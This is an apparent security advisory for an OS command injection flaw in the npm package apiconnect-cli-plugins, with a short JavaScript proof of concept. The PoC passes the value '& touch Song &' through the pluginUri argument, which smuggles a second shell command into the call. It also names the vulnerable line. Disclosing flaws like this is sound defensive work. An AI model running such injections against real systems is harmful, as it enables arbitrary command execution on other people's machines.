CRITICAL9.8
GHSA-c9m9-48pw-6mpv
apiconnect-cli-plugins vulnerable to OS Command Injection
Details
apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the `pluginUri` argument.
### PoC ```js var root = require("apiconnect-cli-plugins"); var payload = "& touch Song &"; root.pluginLoader.installPlugin(payload, ""); ```
The injection point is located in line 181 of file `lib/plugin-loader.js`, in the function `installPlugin(pluginUri, registryUri)`.
Are you affected?
Enter the version of the package you're using.
Affected packages
npm/apiconnect-cli-plugins
Introduced in:
0No fixed version published yet for apiconnect-cli-plugins (npm). Pin to a known-safe version or switch to an alternative.